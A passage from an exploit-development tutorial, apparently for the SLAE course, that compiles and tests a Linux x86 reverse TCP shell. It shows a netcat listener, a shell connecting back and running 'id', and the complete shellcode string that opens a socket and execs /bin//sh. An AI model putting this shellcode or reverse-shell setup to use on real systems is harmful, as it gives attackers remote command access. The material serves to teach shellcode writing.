Let’s try compile and run the file, this time for the reverse TCP assembly file. For compilation i’ve been using modified scripts from the SLAE course, to ease to many compilation tasks when adjusting the code.
The used scripts are available from my Github page.
Compile ASM
$ compile_asm.sh rev_tcp_initial
[+] Assembling with Nasm ...
[+] Linking ...
[+] Done!Preparing a listening port via netcat on terminal one:
nc -lvnp 6666 &
[1] 5581
$ Listening on [0.0.0.0] (family 0, port 6666)
$ Running the ASM binary on terminal two:
$ ./rev_tcp_initialChecking for output on terminal one:
$ Connection from [127.0.0.1] port 6666 [tcp/*] accepted (family 2, sport 40377)
id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)Converting to shellcode for C compilation
$ ../convert_bin_sc.sh rev_tcp_initial
"\xb8\x66\x00\x00\x00\xbb\x01\x00\x00\x00\x6a\x00\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc2\x68\x7f\x01\x01\x01\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\xb8\x66\x00\x00\x00\xbb\x03\x00\x00\x00\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x00\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x01\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x02\x00\x00\x00\xcd\x80\xb8\x0b\x00\x00\x00\x6a\x00\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb9\x00\x00\x00\x00\xba\x00\x00\x00\x00\xcd\x80"Yikes! Nullbytes again and all over the place. Time to remove them again. Luckily, most of the ASM code can be reused.